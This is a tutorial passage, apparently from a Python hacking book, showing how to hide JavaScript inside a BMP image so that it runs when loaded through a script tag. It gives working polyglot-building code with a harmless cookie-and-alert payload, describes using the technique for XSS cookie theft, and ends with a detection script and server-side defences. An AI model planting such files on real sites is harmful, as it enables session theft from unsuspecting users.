Overview of Image File Hacking
Python provides very powerful features for handling files. It can open a binary file and change or append information to it. If you add a script to the various types of image files used on the Web, you can create a hacking tool with powerful features. Let's create a simple program that inserts a cookie-handling JavaScript into a bitmap (BMP) file.
First, let's create the “hello.bmp” image. You can view its HEX values by opening the image in a hex editor. The first two bytes are the magic number used to identify a bitmap file: 0x42 0x4D, the ASCII codes for “B” and “M”. The following 4 bytes hold the size of the BMP file.
BMP File Structure
Image File Hacking
First, let's create a script and insert it into the bitmap file. The browser has the ability to create and save a cookie. A cookie is a small file of information that the web browser records on the PC. Browsers store cookies in their own memory space and file format, and programmers often use cookies to hold a user's login and session information. If a hacker obtains a cookie, it can be used in various methods of attack. The following script creates a cookie, saves information into it, and prints a message in an alert window.
var name = 'id';
var value = 'HongGilDong';
var todayDate = new Date();
todayDate.setDate(todayDate.getDate() + 7);   // expiry 7 days from now (setDate, not setHours)
document.cookie = name + "=" + escape(value) + "; path=/; expires=" + todayDate.toGMTString();
alert(document.cookie);
hello.js
Cookies are stored as (name, value) pairs; here name='id' and value='HongGilDong' are stored in the cookie. A cookie also has a validity period, and here the expiry is set to 7 days from now. Finally, the script displays an alert window confirming that the cookie has been set.
Now, let's create a program to insert a script into a bitmap file.
fname = "hello.bmp"
pfile = open(fname, "r+b")                       #(1) read the whole bitmap into memory
buff = pfile.read()
buff = buff.replace(b'\x2A\x2F', b'\x00\x00')    #(2) bytes are immutable: keep the returned copy
pfile.close()
pfile = open(fname, "w+b")                       #(3) write the cleaned bitmap back
pfile.write(buff)
pfile.seek(2, 0)                                 #(4) move to the byte right after "BM"
pfile.write(b'\x2F\x2A')                         #(5) "/*" opens a JavaScript comment
pfile.close()
pfile = open(fname, "a+b")                       #(6) append after the image data
pfile.write(b'\xFF\x2A\x2F\x3D\x31\x3B')         #(7) "*/=1;" closes the comment
pfile.write(open('hello.js', 'rb').read())       # then the script itself follows
pfile.close()
ImageHacking.py
This is a simple example that opens a binary file and adds a script.
(1) Opening a binary file (read mode): open hello.bmp. “r+b” opens the file in binary mode for reading (the “+” also allows writing, which this step does not use). The entire content is read and stored in the variable “buff”.
(2) Removing errors: every occurrence of the two-byte sequence “*/” in the image data is replaced with two null bytes (0x00), because a stray “*/” inside the pixel data would close the comment early and generate an error when the script is executed. Running print("\x2A\x2F") shows that these two bytes are the ASCII characters “*/”. Since bytes objects are immutable, the result of replace() must be assigned back to “buff”.
(3) Opening a binary file (write mode): open hello.bmp again. “w+b” truncates the file and opens it in binary mode for writing; the content stored in the variable “buff” is written back into hello.bmp.
(4) Moving the file position: “seek(2, 0)” moves the file cursor two bytes from the start of the file, that is, to the byte right after the magic number.
(5) Inserting a comment: write “/*”, which opens a JavaScript comment, directly after the magic number. The magic number identifies a bitmap file; even if some of the remaining data is damaged, the browser can still read the bitmap as long as the magic number is intact. Note that bytes 2 and 3 belong to the 4-byte file-size field, so that field is overwritten by this step.
(6) Opening a binary file (append mode): open hello.bmp with “a+b”, an append mode. Everything written from now on is added to the end of the existing hello.bmp file.
(7) Inserting a comment: write “*/”, which closes the comment, so the whole bitmap image part is commented out when the script runs. The bytes written are 0xFF followed by the ASCII text “*/=1;”; once the comment closes, the leading “BM” and the “=1;” form the harmless statement BM=1; ahead of the appended script.
When the program is run, the bitmap file size increases slightly because of the added script, while the image looks the same to the human eye. If you open the bitmap file in a hex editor, you can verify that the file has changed as follows.
the Result of ImageHacking.py
Let's create a simple HTML page that opens the bitmap file in which the script was planted. The first line displays the hello.bmp image on the screen, and the second line runs the script that has been added to hello.bmp.
<img src="hello.bmp"/>            <!-- Image Output -->
<script src="hello.bmp"></script> <!-- Run the script -->
hello.html
the Result of hello.html
The “hello.js” created here simply saves a cookie and prints its value in an alert window. Now assume the following situation: a hacker inserts into the bitmap file a script that transfers the cookie information to another site. People download a bitmap file that the hacker has posted on a bulletin board and inadvertently run it. At that moment, the user's cookie information is sent to the site the hacker intended. A hacker can therefore use this technique to implement an XSS attack.
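A defender-side check for the traces this tool leaves, added here as an example (not code from the book): it parses the BMP headers with Python's struct module, recomputes the size the image should have from the DIB header, and flags a “/*” written over the size field, a size field that no longer matches the file, and a tail that closes a JavaScript comment after the pixel data. The function names and the in-memory sample bitmaps are my own constructions, not hello.bmp.

```python
import struct

def expected_bmp_size(data: bytes) -> int:
    """Size a well-formed BMP should have, derived from the DIB header rather
    than the 4-byte size field at offset 2 (which the polyglot trick overwrites)."""
    pixel_offset = struct.unpack_from("<I", data, 10)[0]
    width, height = struct.unpack_from("<ii", data, 18)
    bpp = struct.unpack_from("<H", data, 28)[0]
    row_bytes = ((width * bpp + 31) // 32) * 4        # rows are padded to 4 bytes
    return pixel_offset + row_bytes * abs(height)     # negative height = top-down image

def inspect_bmp(data: bytes) -> dict:
    """Flag the traces ImageHacking.py leaves in a bitmap: a comment opener over
    the size field, a size field that disagrees with the file, and a tail that
    closes a JavaScript comment after the pixel data."""
    if len(data) < 54 or data[:2] != b"BM":
        return {"bmp": False, "suspicious": False}
    declared = struct.unpack_from("<I", data, 2)[0]
    tail = data[expected_bmp_size(data):]
    f = {
        "bmp": True,
        "comment_opener_at_offset_2": data[2:4] == b"/*",
        "size_field_mismatch": declared != len(data),
        "trailing_bytes": len(tail),
        "comment_closer_in_tail": b"*/" in tail,
    }
    f["suspicious"] = (f["comment_opener_at_offset_2"] or f["comment_closer_in_tail"]
                       or (f["size_field_mismatch"] and f["trailing_bytes"] > 0))
    return f

def clean_sample() -> bytes:
    """Constructed 2x2 24-bit white bitmap, built in memory (not the page's hello.bmp)."""
    pixels = (b"\xff" * 6 + b"\x00\x00") * 2          # 2 rows: 6 data bytes + 2 pad bytes
    file_hdr = b"BM" + struct.pack("<IHHI", 54 + len(pixels), 0, 0, 54)
    dib_hdr = struct.pack("<IiiHHIIiiII", 40, 2, 2, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)
    return file_hdr + dib_hdr + pixels

def tampered_sample() -> bytes:
    """The clean sample with the same edits ImageHacking.py makes (constructed fixture)."""
    clean = clean_sample()
    return clean[:2] + b"/*" + clean[4:] + b"\xff*/=1;" + b"alert(document.cookie)"

if __name__ == "__main__":
    for label, sample in (("clean", clean_sample()), ("tampered", tampered_sample())):
        print(label, inspect_bmp(sample))
```

The same size mismatch is what an upload filter should reject before the file is stored. Serving user-supplied images with the correct Content-Type and the X-Content-Type-Options: nosniff header also stops a browser from executing a bitmap loaded through a script tag.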